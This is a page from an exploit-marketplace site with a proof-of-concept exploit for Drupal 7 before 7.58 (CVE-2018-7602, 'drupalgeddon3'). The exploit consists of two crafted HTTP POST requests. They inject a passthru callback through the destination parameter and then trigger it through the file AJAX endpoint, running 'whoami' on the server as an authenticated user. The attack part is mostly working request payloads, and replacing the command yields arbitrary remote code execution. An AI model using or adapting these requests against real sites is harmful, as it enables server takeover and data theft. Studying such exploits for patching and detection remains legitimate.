[ 授权 ] [ 注册 ] [ 恢复账号 ]
联系我们
你可以由此方式联系我们:
0day.today   漏洞利用市场和0day漏洞利用数据库

Drupal < 7.58 - drupalgeddon3 Authenticated Remote Code Execution (PoC) Exploit

作者
Blaklis
风险
[
安全风险级别 - 高
]
0day-ID
0day-ID-30262
类别
web applications
添加日期
26-04-2018
CVE
CVE-2018-7602
平台
php
This is a sample of exploit for Drupal 7 new vulnerability SA-CORE-2018-004 / CVE-2018-7602.
 
You must be authenticated and with the power of deleting a node. Some other forms may be vulnerable : at least, all of forms that is in 2-step (form then confirm).
 
POST /?q=node/99/delete&destination=node?q[%2523][]=passthru%26q[%2523type]=markup%26q[%2523markup]=whoami HTTP/1.1
[...]
form_id=node_delete_confirm&_triggering_element_name=form_id&form_token=[CSRF-TOKEN]
 
Retrieve the form_build_id from the response, and then triggering the exploit with : 
 
POST /drupal/?q=file/ajax/actions/cancel/%23options/path/[FORM_BUILD_ID] HTTP/1.1
[...]
form_build_id=[FORM_BUILD_ID]
 
This will display the result of the whoami command.
 
Patch your systems!
Blaklis

#  0day.today [2024-07-02]  #